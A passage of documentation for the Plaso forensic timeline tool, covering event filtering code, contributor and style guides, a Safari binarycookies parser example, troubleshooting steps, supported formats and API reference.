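    if token == '(':
      tree = parse_or()
      if take() != ')':
        raise ValueError('missing closing parenthesis')
      return tree
    operator = take()
    if operator not in OPERATORS:
      raise ValueError('unknown operator: {0:s}'.format(operator))
    literal = take()
    if len(literal) < 2 or literal[0] != "'" or literal[-1] != "'":
      raise ValueError('expected a quoted value after {0:s}'.format(operator))
    return ('cmp', token, operator, literal[1:-1])

  tree = parse_or()
  if tokens:
    raise ValueError('unexpected token: {0:s}'.format(tokens[0]))
  return tree


def evaluate(tree, event):
  """Returns True if the event (a dict of attribute values) matches tree."""
  if tree[0] in ('and', 'or'):
    left, right = evaluate(tree[1], event), evaluate(tree[2], event)
    return (left and right) if tree[0] == 'and' else (left or right)
  _, attribute, operator, literal = tree
  if attribute not in event:
    return False  # events without the attribute are excluded, as described above
  value = str(event[attribute])
  if operator == 'is':
    return value == literal
  if operator == 'contains':
    return literal.lower() in value.lower()  # case-insensitive, like 'joe' above
  if operator == 'iregexp':
    return re.search(literal, value, re.IGNORECASE) is not None
  # '>' / '<': zero-padded 'YYYY-MM-DD HH:MM:SS' dates compare correctly as text.
  return value > literal if operator == '>' else value < literal


def filter_events(expression, events):
  tree = parse_filter(expression)
  return [event for event in events if evaluate(tree, event)]


# Constructed sample events carrying the common attributes named above.
SAMPLE_EVENTS = [
    {'date': '2012-10-10 18:30:00', 'source': 'LNK', 'message': 'evil.exe opened',
     'timestamp_desc': 'Last Written', 'filename': 'C:/Users/joe/evil.lnk',
     'username': 'Joe'},
    {'date': '2012-10-10 12:30:00', 'source': 'REG', 'message': 'Run key: evil',
     'timestamp_desc': 'Last Written', 'filename': 'C:/Windows/System32/config/SOFTWARE'},
    {'date': '2012-10-11 09:00:00', 'source': 'LOG', 'message': 'service started',
     'timestamp_desc': 'Content Modification', 'filename': '/var/log/mystery.log'},
]
```

Running the three expressions from this section against SAMPLE_EVENTS shows the time-window filter keeping only the LNK event, the username filter keeping only the event that carries a username attribute, and the combined filter keeping the LNK and REG events.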
For now, the new version does not have some of the capabilities that the older version had, that is to say the:
• Yara rules to filter out content.
• Inclusion/exclusion regular expressions.
These are things that are on the roadmap and should hopefully be added before too long.
Another new thing that the older version did not have is metadata stored inside the storage file. Since the older version only used l2t_csv as the output (default output, configurable) it had no means of storing metadata about the runtime of the tool nor the events that were collected. That has changed with the new version. Some of the metadata stored can be used for filtering out data (or has the potential of being used for that) or at least be printed out again, since it contains useful information about the collection.
pinfo.py -v /cases/timeline/myhost.plaso
This tool will show metadata information that is stored inside the storage file, so you can see exactly what is stored in there. The storage may also contain additional details, such as tags for events, analysis reports and other data.
Another aspect that was not part of the older version is tagging and any other sort of automatic analysis on the dataset. For more information see: tagging rules.
CHAPTER TWO: DEVELOPER DOCUMENTATION
2.1 Developer Guide
• Setting up and maintaining your development environment
• Getting Started
• Design
• Roadmap
• Contributing Code
2.1.1 Setting up and maintaining your development environment
The first challenge you will encounter is setting up and maintaining your development environment.
Start by setting up a development environment:
• Development environment in a VirtualEnv
• Development environment on Fedora
• Development environment on MacOS
• Development environment on Ubuntu
• Development environment on Windows
2.1.2 Getting Started
Once you’ve set up your development environment we recommend starting simple:
• How to write a parser
• How to write a parser plugin
• How to write an analysis plugin
• How to write an output module
• How to write a tagging rule
2.1.3 Design
Overview of the general architecture of Plaso:
• Architecture
• API documentation
2.1.4 Roadmap
A high level roadmap can be found here. Individual features are tracked as a github issue and labeled as “enhancement”. A list of features we’d already like to add can be found here.
2.1.5 Contributing Code
Want to add a parser to Plaso and you are ready to go? Start by checking here if someone is already working on it. If you don’t see anything there you can just go ahead and create an issue on the github site and mark it as “enhancement”. Assign the issue to yourself so that we can keep track of who is working on what.
If you cannot program and still have a great idea for a feature please go ahead and create an issue and leave it unassigned; note that the priority will be whoever wants to work on it.
Before you start writing code, please review the following:
• Style guide. All code submitted to the project needs to follow this style guide.
• Code review. All code that is submitted into the project is reviewed by at least one other person.
• Adding a new dependency. If your code requires adding a new dependency please check out these instructions.
Before you submit your first code review
1. Join the development mailing list: [email protected] and the Slack channel; we recommend using the same account as in step 1
2. Install the required development tools like pylint and python-mock
3. Make sure to run all the tests in the Plaso codebase, and that they successfully complete in your development environment
4. Make sure your development environment is set up correctly so that you can develop and test correctly.
5. Make sure your email address and name are correctly set in git. You can use the following commands:
git config --global user.name "Full Name"
git config --global user.email [email protected]
git config --global push.default matching
Use git config -l to see your current configuration.
Core features changes
Sometimes you need to make some change to the core of the Plaso codebase. In those cases we ask that contributors first create a short design proposal explaining the rationale behind the change. The design doc needs to contain:
1. A description of the problem you are facing
2. A list of the objectives of the change
3. A discussion of what’s in scope and what’s not
4. A description of your proposed solution
The preferred way of creating these design docs is to use Google Docs and send the link to the development mailing list so that it can be discussed further before starting to implement the code.
The current design docs are stored here. You may not have access to that folder, so you may need to request access to it.
Tests
Tests are part of a maintainable code base. Code without sufficient tests is very likely to be broken by a large rewrite/refactor.
Plaso has specific guidelines for writing tests: Style guide - tests
2.2 Style Guide
Plaso follows the log2timeline style guide.
2.2.1 Plaso specific style points
Event data attribute containers
Data types
Every event data attribute container defines a data type (DATA_TYPE).
Conventions for the data type names are:
1. If the data type is operating system (or operating system convention such as POSIX) specific, start with the name of the operating system or convention. Currently supported prefixes:
• android
• chromeos
• ios
• linux
• macos
• windows
Otherwise skip the operating system prefix.
2. Next is the name of the application, sub system or data format, for example ‘chrome’, ‘windows:registry’ or ‘windows:evtx’.
TODO: describe which one is preferred and why.
3. What follows is application, sub system or data format specific type information, for example ‘windows:evtx:record’.
Value types
Values stored in an event data attribute container must be of certain types otherwise event filtering or output formatting can break. Supported Python types are:
• bool (also see note below)
• int
• str
A list of the previously mentioned types is also supported. Do not use dict or binary strings.
Use a bool sparingly. For now it is preferred to preserve the original type. For example, if -1 represents False and 0 True, store the value as an integer, not as a bool. The message formatter can represent the numeric value as a human readable string.
Tests
• Use the test functions available in the local test_lib.py as much as possible instead of writing your own test functions. If you think a test function is missing please add it, or mail the developer list to see if you can get someone else to do it.
• Use self.CheckTimestamp for testing timestamp values.
Common test code should be stored in “test library” files, for example the parser test library is tests/parsers/test_lib.py.
We do this for a few reasons:
• to remove code duplication in “boiler plate” test code;
• to make the tests more uniform in both look-and-feel but also what is tested;
• improve test coverage;
• isolate core functionality from tests to prevent some future core changes affecting the parsers and plugins too much.
2.3 How to write a parser
2.3.1 Introduction
This page is intended to give you an introduction into developing a parser for Plaso.
• First a step-by-step example is provided to create a simple binary parser for the Safari Cookies.binarycookies file.
• At the bottom are some common troubleshooting tips for problems that others have run into before you.
This page assumes you have at least a basic understanding of programming in Python and use of git.
2.3.2 Format
Before you can write a binary file parser you will need to have a good understanding of the file format. A description of the Safari Cookies.binarycookies format can be found here.
2.3.3 Parsers vs. Plugins
Before starting work on a parser, check if Plaso already has a parser that handles the underlying format of the file you’re parsing. Plaso currently supports plugins for the following file formats:
• Bencode
• Compound zip files
• Web Browser Cookies
• ESEDB
• OLECF
• Plist
• SQLite
• Syslog
• Windows Registry
If the artifact you’re trying to parse is in one of these formats, you need to write a plugin of the appropriate type, rather than a parser.
For our example, however, the Safari Cookies.binarycookies file is in its own binary format, so a separate parser is appropriate.
2.3.4 Test data
First we make a representative test file and add it to the test_data/ directory, in our example:
test_data/Cookies.binarycookies
Make sure that the test file does not contain sensitive or copyrighted material.
2.3.5 Parsers, formatters, events and event data
• parser; a subclass of FileObjectParser that extracts events from the content of a file.
• formatter (or event formatter); a subclass of EventFormatter which generates a human readable description of the event data.
• event; a subclass of EventObject which represents an event.
• event data; a subclass of EventData which represents data related to the event.
Writing the parser
Registering the parser
Add an import for the parser to:
plaso/parsers/__init__.py
It should look like this:
from plaso.parsers import safari_cookies
When plaso.parsers is imported this will load the safari_cookies module safari_cookies.py.
The parser class BinaryCookieParser is registered using manager.ParsersManager.RegisterParser(BinaryCookieParser).
plaso/parsers/safari_cookies.py
# -*- coding: utf-8 -*-
"""Parser for Safari Binary Cookie files."""

from plaso.parsers import interface
from plaso.parsers import manager


class BinaryCookieParser(interface.FileObjectParser):
  """Parser for Safari Binary Cookie files."""

  NAME = 'binary_cookies'
  DATA_FORMAT = 'Safari Binary Cookie file'

  def ParseFileObject(self, parser_mediator, file_object, **kwargs):
    """Parses a Safari binary cookie file-like object.

    Args:
      parser_mediator (ParserMediator): parser mediator.
      file_object (dfvfs.FileIO): file-like object to be parsed.

    Raises:
      UnableToParseFile: when the file cannot be parsed, this will signal
          the event extractor to apply other parsers.
    """
    ...


manager.ParsersManager.RegisterParser(BinaryCookieParser)
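To show what the body of ParseFileObject has to do for this format, the following is an added, stand-alone Python reader for the binarycookies layout, together with a small builder that constructs sample data in memory. It is not Plaso's safari_cookies parser and does not use the Plaso API; the field layout is the commonly documented one and should be checked against the format description linked above before it is relied upon.

```python
"""Stand-alone reader for the Safari Cookies.binarycookies format.

Added example, not Plaso's safari_cookies parser. The layout below is the
commonly documented one (big-endian file header, little-endian page and record
fields, dates as Mac absolute time doubles); check it against the format
description linked above before relying on it for real evidence.
"""
import datetime
import struct

MAC_EPOCH = datetime.datetime(2001, 1, 1, tzinfo=datetime.timezone.utc)
FLAG_SECURE = 0x01
FLAG_HTTP_ONLY = 0x04
RECORD_HEADER_SIZE = 56  # 8 uint32 fields, 8 zero bytes, 2 float64 dates


def _read_cstring(data, offset):
  """Returns the NUL-terminated UTF-8 string starting at offset."""
  return data[offset:data.index(b'\x00', offset)].decode('utf-8')


def _parse_record(page, offset):
  """Parses one cookie record; string offsets are relative to the record."""
  (size, _unknown1, flags, _unknown2, url_offset, name_offset, path_offset,
   value_offset) = struct.unpack_from('<8I', page, offset)
  expiration, creation = struct.unpack_from('<2d', page, offset + 40)
  record = page[offset:offset + size]
  return {
      'url': _read_cstring(record, url_offset),
      'name': _read_cstring(record, name_offset),
      'path': _read_cstring(record, path_offset),
      'value': _read_cstring(record, value_offset),
      'secure': bool(flags & FLAG_SECURE),
      'http_only': bool(flags & FLAG_HTTP_ONLY),
      'expiration': MAC_EPOCH + datetime.timedelta(seconds=expiration),
      'creation': MAC_EPOCH + datetime.timedelta(seconds=creation),
  }


def parse_binarycookies(data):
  """Returns a list of cookie dicts from the bytes of a binarycookies file."""
  if data[:4] != b'cook':
    raise ValueError('missing "cook" signature; not a binarycookies file')
  number_of_pages = struct.unpack_from('>I', data, 4)[0]
  page_sizes = struct.unpack_from('>{0:d}I'.format(number_of_pages), data, 8)
  offset = 8 + 4 * number_of_pages
  cookies = []
  for page_size in page_sizes:
    page = data[offset:offset + page_size]
    offset += page_size
    if page[:4] != b'\x00\x00\x01\x00':
      raise ValueError('bad page header at offset {0:d}'.format(offset - page_size))
    number_of_cookies = struct.unpack_from('<I', page, 4)[0]
    record_offsets = struct.unpack_from(
        '<{0:d}I'.format(number_of_cookies), page, 8)
    cookies.extend(_parse_record(page, record_offset) for record_offset in record_offsets)
  return cookies


def _build_record(url, name, path, value, flags, expiration, creation):
  """Serialises one record (only used to construct the sample file below)."""
  strings = [s.encode('utf-8') + b'\x00' for s in (url, name, path, value)]
  offsets, position = [], RECORD_HEADER_SIZE
  for string in strings:
    offsets.append(position)
    position += len(string)
  header = struct.pack('<8I', position, 0, flags, 0, *offsets)
  header += b'\x00' * 8 + struct.pack('<2d', expiration, creation)
  return header + b''.join(strings)


def build_binarycookies(cookies):
  """Wraps records in a single page and a file header (sample data only)."""
  records = [_build_record(**cookie) for cookie in cookies]
  offsets, position = [], 8 + 4 * len(records) + 4
  for record in records:
    offsets.append(position)
    position += len(record)
  page = b'\x00\x00\x01\x00' + struct.pack('<I', len(records))
  page += struct.pack('<{0:d}I'.format(len(records)), *offsets) + b'\x00' * 4
  page += b''.join(records)
  return b'cook' + struct.pack('>2I', 1, len(page)) + page


# Constructed sample cookies (not from a real cookie store). Dates are seconds
# since 2001-01-01 UTC: 378691200 = 2013-01-01, 347068800 = 2012-01-01.
SAMPLE_COOKIES = [
    {'url': '.example.com', 'name': 'session', 'path': '/', 'value': 'abc123',
     'flags': FLAG_SECURE | FLAG_HTTP_ONLY,
     'expiration': 378691200.0, 'creation': 347068800.0},
    {'url': 'tracker.example.net', 'name': 'uid', 'path': '/', 'value': '42',
     'flags': 0, 'expiration': 378691200.0, 'creation': 347068800.0},
]
```

In a real Plaso parser the same extraction would read from file_object, raise UnableToParseFile when the signature check fails, and hand each cookie to parser_mediator as event data instead of returning dicts.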
Writing the message formatter
The event message format is defined in data/formatters/*.yaml.
For more information about the configuration file format see: message formatting
2.4 How to write a parser plugin
Writing a parser plugin is different depending on which parser you’re writing a plugin for. Parsers that support plugins are:
• bencode
• cookie
• czip (Compound zip files)
• esedb
• olecf
• plist
• sqlite
• syslog
• winreg
2.5 How to write an analysis plugin
2.5.1 Create file and class
• Plugin file in plaso/analysis/
– Create an empty subclass of AnalysisPlugin
– Register it with the analysis plugin by calling AnalysisPluginManager.RegisterPlugin
• Test file in tests/analysis/
– Create an empty subclass of tests.analysis.test_lib.AnalysisPluginTestCase
2.5.2 Write minimal tests
• Write a test that loads your plugin
• It will fail initially, but running the test while you’re developing your plugin gives you a quick way to see if your code is doing what you expect.
2.5.3 Develop plugin
• Implement your subclass of AnalysisPlugin
• You’ll need to define/override:
– NAME
– ExamineEvent()
– CompileReport()
• You may also want to override:
– URLS
– ENABLE_IN_EXTRACTION, if your plugin is eligible to run while Plaso is extracting events.
2.5.4 Expand tests
• Add additional tests that test your plugin
2.5.5 Register classes
• Edit plaso/analysis/__init__.py to import your plugin in the correct alphabetical order.
2.5.6 Code review/submit
2.6 How to write an output module
2.6.1 Create file and class
• Plugin file in plaso/output/
– Create an empty subclass of plaso.output.interface.OutputModule
– Register it with the output module manager by calling OutputManager.RegisterOutput
• Test file in tests/output/
– Create an empty subclass of tests.output.test_lib.OutputModuleTestCase
2.6.2 Write minimal tests
• Write a test that loads your output module.
• It will fail initially, but running the test while you’re developing your plugin gives you a quick way to see if your code is doing what you expect.
2.6.3 Develop plugin
• Implement your subclass of plaso.output.interface.OutputModule
• You’ll need to define/override:
– NAME
– DESCRIPTION
– WriteEventBody
• You may also want to override:
– Open()
– Close()
– GetMissingArguments()
– WriteHeader()
– WriteEventMACBGroup()
– WriteFooter()
2.6.4 Expand tests
• Add additional tests that test your plugin
2.6.5 Register classes
• Edit plaso/output/__init__.py to import your plugin in the correct alphabetical order.
2.6.6 Code review/submit
• Create a PR to have the changes reviewed and merged with the master branch.
CHAPTER THREE: TROUBLESHOOTING
This page contains instructions that can be used to assist you in debugging potential issues with Plaso and its dependencies.
3.1 Quick list
1. Check the commit history and issue tracker to see if the bug has already been fixed;
2. If you are running the development release make sure Plaso and dependencies are up to date, see: Developers Guide
3. If you are experiencing an issue that cannot directly be attributed to some broken code, e.g. the tests are getting killed, check your system logs; it might be a problem with resources available to Plaso;
4. Try to isolate the error, see below.
If everything fails create a new issue on the issue tracker. Please provide as much detailed information as possible, keep in mind that:
• we cannot fix errors based on vague descriptions;
• we cannot look into your thoughts or on your systems;
• we cannot easily isolate errors if you keep changing your test environment.
Hence please provide us with the following details:
• What steps will reproduce the problem?
– What output did you expect?
– What do you see instead?
• The output of log2timeline.py --troubles, which provides:
– The Python version including operating system and architecture
– The path to plaso/log2timeline
– The version of plaso/log2timeline
– Information about dependencies
• Are you processing a storage media image (if so, which format), a directory or an individual file?
• Were you able to isolate the error to a specific file? Is it possible to share the file with the developer?
• Any additional information that could be of use e.g. build logs, error logs, debug logs, etc.
Note that the github issue tracker uses markdown and thus please escape blocks of error output accordingly.
Also see the sections below on how to troubleshoot issues of a specific nature.
3.1.1 Performance related issues
• On what type of media is your source data stored? What type of media are you writing to?
– A local disk, a removable disk or network storage?
– Both removable media and network storage can add additional latency to reads and writes making overall processing slow. It is recommended to at least write to local low-latency media.
• Are you seeing workers being killed?
– Respawning of workers creates more overhead and slower processing times.
– Workers being killed typically indicates one of the parsers misbehaving. If the worker is consuming a high amount of memory, also see section “High memory usage” below.
• Are you running Plaso in a VM or Docker container?
3.2 Isolating errors
The most important part of troubleshooting is isolating the error.
Can you run the tests successfully?
$ python run_tests.py
...
----------------------------------------------------------------------
Ran 585 tests in 66.530s

OK
If an error occurs when processing a storage media image try to run with the storage media image file and/or the file system directly mounted. Mounting the storage media image file will bypass libraries (modules) supporting the storage media image format. Running source_analyzer.py can help pinpoint the issue, e.g.
PYTHONPATH=. python examples/source_analyzer.py --no-auto-recurse
Try:
• logging to a log file log2timeline.py --log-file=log2timeline.log ...;
• running in debug mode log2timeline.py --debug ...;
• running in single process mode, which bypasses any issues with multiprocessing: log2timeline.py --single-process ...;
• mounting the file system as well to bypass libraries (modules) supporting the file system, e.g. the SleuthKit and pytsk;
• running in single process and debug mode, see section below.
3.3 Producing debug logs
To produce debugging logs, run log2timeline like so: log2timeline.py --log-file=log2timeline_problem.log.gz --debug. This will create multiple, gzip-compressed log files. There will be one called log2timeline_problem.log.gz containing logs from the main log2timeline process, and one log file for each worker process.
Note that the .gz file suffix is important, as it triggers Plaso to compress the log output. In uncompressed form, the logs are very large. The compressed logs can be reviewed with gzip-aware tools like zless and zgrep.
3.4 Import errors
It sometimes happens that the tests fail with an import error, e.g.
ImportError: Failed to import test module: plaso.parsers.winreg_plugins.shutdown_test
Traceback (most recent call last):
  File "/usr/lib64/python3.7/unittest/loader.py", line 254, in _find_tests
    module = self._get_module_from_name(name)
  File "/usr/lib64/python3.7/unittest/loader.py", line 232, in _get_module_from_name
    __import__(name)
  File "./plaso/parsers/__init__.py", line 4, in <module>
    from plaso.parsers import asl
ImportError: cannot import name asl
This does not necessarily mean that the code cannot find the asl module. The import error can mask an underlying issue. Try running the following commands in a Python shell:
$ python
import sys
sys.path.insert(0, u'.')
import plaso
It can also mean that you have multiple versions of Plaso installed on your system and Python tries to import from the wrong one.
3.5 Crashes, hangs and tracebacks
In the context of Plaso crashes and tracebacks have different meanings:
• crash; an error that causes an abrupt termination of the program you were running e.g. a segfault (SIGSEGV)
• traceback; the back trace of an error that was caught by an exception handler that can cause a termination of the program you were running
3.5.1 A worker segfault-ing
Since Plaso relies on several compiled dependencies it is possible that a worker segfaults (SIGSEGV).
As part of the 1.3 pre-release bug hunting a SIGSEGV signal handler was added; however, this turned out, as expected, to be unreliable. It did add an interesting side effect that is very useful for debugging. If the SIGSEGV signal handler is enabled the worker process typically remains in the “running” state but stops producing event objects. What happens under the hood is that the SIGSEGV signal is caught but the worker is unable to cleanly terminate. Because of this “frozen” state of the worker it is very easy to attach a debugger, e.g. gdb python -p PID.
A kill -11 PID however seems to be cleanly handled by the SIGSEGV signal handler and puts the worker into “error” status.
3.5.2 A worker gives a killed status
This typically indicates that the worker was killed (SIGKILL), likely by an external process, e.g. the Out Of Memory (OOM) killer.
Your system logs might indicate why the worker was killed.
3.5.3 Which processes are running
The following commands help you determine which Plaso processes are running on your system:
Linux:
top -p `ps -ef | grep log2timeline.py | grep python | awk '{ print $2 }' | tr '\n' ',' | sed 's/,$//'`
MacOS:
ps aux | grep log2timeline.py | grep python | awk '{print $2}' | tr '\n' ',' | sed 's/,$//'
3.5.4 Analyzing crashes with single process and debug mode
In single process and debug mode (log2timeline.py --debug --single-process ...) log2timeline will run a Python debug shell (pdb) when an uncaught Python exception is raised.
Use:
• w to print the frames.
• u to go up one frame or d to go down one frame.
• l to print source code of the current frame.
Note that typically the top-level (oldest) frame will contain the exception:
p exception
Note that inside pdb you can run any Python commands, including loading new libraries, e.g. for troubleshooting. You can prepend commands with an exclamation mark (!) to indicate that you want to run a Python command as opposed to a debug shell one.
To print the attributes of the current object you are looking at:
!self.__dict__
To print the current argument stack to see what arguments are available to you:
args
3.5.5 Analyzing crashes with gdb
Once you have isolated the file that causes the crash and you cannot share the file you can generate a back trace that can help us fix the error.
First make sure you have the debug symbols installed.
Then run Plaso as a single process with gdb:
gdb --ex r --args log2timeline.py --single-process -d /tmp/test.dump /tmp/file_that_crashes_the_tool
To generate a back trace:
bt
Note that often the first 10 lines of the back trace are sufficient information.
An alternative approach is to attach a debugger to it once the program is running:
gdb python -p PID
Where PID is the process identifier of the program. Once the debugger is attached continue running:
c
Wait until the crash occurs and generate a back trace.
Also see: DebuggingWithGdb, gdb Support
3.6 High memory usage
Plaso consists of various components. It can happen that one of these components uses a lot of memory or even leaks memory. In these cases it is important to isolate the error, see before, to track down what the possible culprit is. Also see: Profiling memory usage
Also see Troubleshooting Plaso Issues - Memory Edition
3.7 MacOS specific issues
3.7.1 How do I remove a Plaso installation
If you installed Plaso via the installer script in the .dmg, the MacOS package manager can be used to remove a Plaso installation. For more information about using the MacOS package manager see:
• http://superuser.com/questions/36567/how-do-i-uninstall-any-apple-pkg-package-file
3.7.2 PyParsing errors
MacOS bundles its own version of PyParsing that is older than the version required by Plaso. Fix this by using the special wrapper scripts (log2timeline.sh, et al.), or if you don’t want to do that, manipulate PYTHONPATH so that the newer version is loaded. This is detailed on the MacOS development page.
3.7.3 ImportError: cannot import name dependencies
There can be numerous reasons for imports to fail on MacOS; here we describe some of the more common ones encountered:
• clashing versions; you have multiple clashing versions installed on your system. Check the Python site-packages paths such as: /Library/Python/2.7/site-packages/, /usr/local/lib/python2.7/site-packages/.
• you used pip without virtualenv and have messed up your site-packages
3.7.4 You used pip without virtualenv and have messed up your site-packages
The use of pip without virtualenv on MacOS is strongly discouraged, unless you are very familiar with these tools. You might have already messed up your site-packages beyond a state of a timely repair.
3.8 Ubuntu Linux specific issues
3.8.1 Origin of an installed package
To determine the origin of an installed package:
apt-cache showpkg <package name>
3.9 Windows specific issues
3.9.1 Not a valid Win32 application
When I load one of the Python modules I get:
ImportError: DLL load failed: %1 is not a valid Win32 application.
This means your Python interpreter (on Windows) cannot load a Python module since the module is not a valid Win32 DLL file. One cause of this could be a mismatch between a 64-bit Python and a 32-bit build of the module (or vice versa).
3.9.2 Unable to find an entry point in DLL
When I try to import one of the Python-bindings I get:
ImportError: DLL load failed: The specified procedure could not be found.
Make sure the DLL is built for the right WINAPI version, check the value of WINVER of your build.
3.9.3 setup.py and build errors
Unable to find vcvarsall.bat
When running setup.py I get:
error: Unable to find vcvarsall.bat
Make sure the environment variable VS90COMNTOOLS is set, e.g. for Visual Studio 2010:
set VS90COMNTOOLS=%VS100COMNTOOLS%
Or set it to a path:
set VS90COMNTOOLS="C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\Tools\"
ValueError: [u'path'] when running setup.py
When running setup.py I get:
ValueError: [u'path']
Try running the command from the “Windows SDK 7.1” or “Visual Studio” Command Prompt.
I’m getting linker “unresolved externals” errors when running setup.py
If you’re building a 64-bit version of a Python binding with Visual Studio 2010 Express make sure to use the “Windows SDK 7.1 Command Prompt”.
CHAPTER FOUR: SUPPORTED FORMATS
The information below is based on version 1.5.0.
4.1 Storage Media Image File Formats
Storage Media Image File Format support is provided by dfvfs.
4.2 Volume System Formats
Volume System Format support is provided by dfvfs.
4.3 File System Formats
File System Format support is provided by dfvfs.
4.4 File formats
• Apple System Log (ASL)
• Android usage-history (app usage)
• Basic Security Module (BSM)
• Bencode files
• Chrome Disk Cache Format
• Chrome preferences
• CUPS IPP
• Extensible Storage Engine (ESE) Database File (EDB) format using libesedb
• Firefox Cache
• Java WebStart IDX
• Jump Lists .customDestinations-ms files
• MacOS Application firewall
• MacOS Keychain
• MacOS Securityd
• MacOS Wifi
• mactime logs
• McAfee Anti-Virus Logs
• Microsoft Internet Explorer History File Format (also known as MSIE 4 - 9 Cache Files or index.dat) using libmsiecf
• Microsoft IIS log files
• NTFS $MFT and $UsnJrnl:$J using libfsntfs
• OLE Compound File using libolecf
• Opera Browser history
• OpenXML
• Pcap files
• Portable Executable (PE) files using pefile
• PL SQL cache file (PL-SQL developer recall files)
• Popularity Contest log
• Property list (plist) format using plistlib
• Restore Point logs (rp.log)
• Safari Binary Cookies
• SCCM client logs
• SELinux audit logs
• SkyDrive log and error log files
• SQLite database format using SQLite
• Symantec AV Corporate Edition and Endpoint Protection log
• Syslog
• utmp, utmpx
• Windows Event Log (EVT) using libevt
• Windows Firewall
• Windows Job files (also known as “at jobs”)
• Windows Prefetch files
• Windows Recycle bin (INFO2 and $I/$R)
• Windows NT Registry File (REGF) using libregf
• Windows Shortcut File (LNK) format using liblnk (including shell item support)
• Windows XML Event Log (EVTX) using libevtx
• Xchat and Xchat scrollback files
• Zsh history files
4.5 Bencode file formats
• Transmission
• uTorrent
4.6 ESE database file formats
• Internet Explorer WebCache format
• Windows 8 File History
4.7 OLE Compound File formats
• Document summary information
• Summary information (top-level only)
• Jump Lists .automaticDestinations-ms files
4.8 Property list (plist) formats
• Airport
• Apple Account
• Bluetooth
• Install History
• iPod/iPhone
• Mac User
• Safari history
• Software Update
• Spotlight
• Spotlight Volume Information
• Timemachine
4.9 SQLite database file formats
• Android call logs
• Android SMS
• Chrome cookies
• Chrome browsing and downloads history
• Chrome Extension activity
• Firefox cookies
• Firefox browsing and downloads history
• Google Drive
• iMessage (iOS and MacOS)
• Kik (iOS)
• Launch services quarantine events
• MacKeeper cache
• MacOS document versions
• Skype text conversations
• Twitter (iOS)
• Zeitgeist activity database
4.10 Windows Registry formats
• AppCompatCache
• BagMRU (or ShellBags)
• CCleaner
• Explorer ProgramsCache
• Less Frequently Used (LFU)
• MountPoints2
• Most Recently Used (MRU) MRUList and MRUListEx (including shell item support)
• MSIE Zones
• Office MRU
• Outlook Search
• Run and RunOnce keys
• SAM
• Services
• Shutdown
• Task Scheduler Cache (Task Cache)
• Terminal Server MRU
• Timezones
• Typed URLS
• USB
• USBStor
• UserAssist
• WinRar
• Windows version information
4.11 Hashers Supported
• MD5
• SHA1
• SHA256
CHAPTER FIVE: PLASO PACKAGE
5.1 Subpackages
5.1.1 plaso.analysis package
Submodules
plaso.analysis.browser_search module
A plugin that extracts browser history from events.
class plaso.analysis.browser_search.BrowserSearchPlugin
Bases: plaso.analysis.interface.AnalysisPlugin
Analyze browser search entries from events.
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns analysis report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = False
ExamineEvent(mediator, event, event_data, event_data_stream)
Analyzes an event.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'browser_search'
class plaso.analysis.browser_search.SEARCH_OBJECT(time, source, engine, search_term)
Bases: tuple
property engine
Alias for field number 2
property search_term
Alias for field number 3
property source
Alias for field number 1
property time
Alias for field number 0
plaso.analysis.chrome_extension module
A plugin that gathers extension IDs from Chrome browser history.
class plaso.analysis.chrome_extension.ChromeExtensionPlugin
Bases: plaso.analysis.interface.AnalysisPlugin
Convert Chrome extension IDs into names, requires Internet connection.
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns analysis report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = True
ExamineEvent(mediator, event, event_data, event_data_stream)Analyzes an event.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis pluginsand other components, such as storage and dfvfs.
• event (EventObject) – event to examine.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'chrome_extension'
plaso.analysis.definitions module
This file contains the definitions for analysis plugins.
plaso.analysis.file_hashes module
A plugin to generate a list of unique hashes and paths.
class plaso.analysis.file_hashes.FileHashesPlugin
Bases: plaso.analysis.interface.AnalysisPlugin
A plugin for generating a list of file paths and corresponding hashes.
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = True
ExamineEvent(mediator, event, event_data, event_data_stream)
Analyzes an event and extracts hashes as required.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event to examine.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'file_hashes'
plaso.analysis.hash_tagging module
This file contains the interface for analysis plugins.
class plaso.analysis.hash_tagging.HTTPHashAnalyzer(hash_queue, hash_analysis_queue, hashes_per_batch=1, lookup_hash='sha256', wait_after_analysis=0)
Bases: plaso.analysis.hash_tagging.HashAnalyzer
Interface for hash analysis plugins that use HTTP(S).
abstract Analyze(hashes)
Analyzes a list of hashes.
Parameters hashes (list[str]) – hashes to look up.
Returns analysis results.
Return type list[HashAnalysis]
MakeRequestAndDecodeJSON(url, method, **kwargs)
Makes an HTTP request and decodes the result as JSON.
Parameters
• url (str) – URL to make a request to.
• method (str) – HTTP method used to make the request. GET and POST are supported.
• kwargs – parameters to the requests .get() or .post() methods, depending on the value of the method parameter.
Returns body of the HTTP response, decoded from JSON.
Return type dict[str, object]
Raises
• ConnectionError – if it is not possible to connect to the given URL, or if the request returns an HTTP error.
• ValueError – if an invalid HTTP method is specified.
class plaso.analysis.hash_tagging.HashAnalysis(subject_hash, hash_information)
Bases: object
Analysis information about a hash.
hash_information
object containing information about the hash.
Type object
subject_hash
hash that was analyzed.
Type str
class plaso.analysis.hash_tagging.HashAnalyzer(hash_queue, hash_analysis_queue, hashes_per_batch=1, lookup_hash='sha256', wait_after_analysis=0)
Bases: threading.Thread
Class that defines the interfaces for hash analyzer threads.
This interface should be implemented once for each hash analysis plugin.
analyses_performed
number of analysis batches completed by this analyzer.
Type int
hashes_per_batch
maximum number of hashes to analyze at once.
Type int
lookup_hash
name of the hash attribute to look up.
Type str
seconds_spent_analyzing
number of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.).
Type int
wait_after_analysis
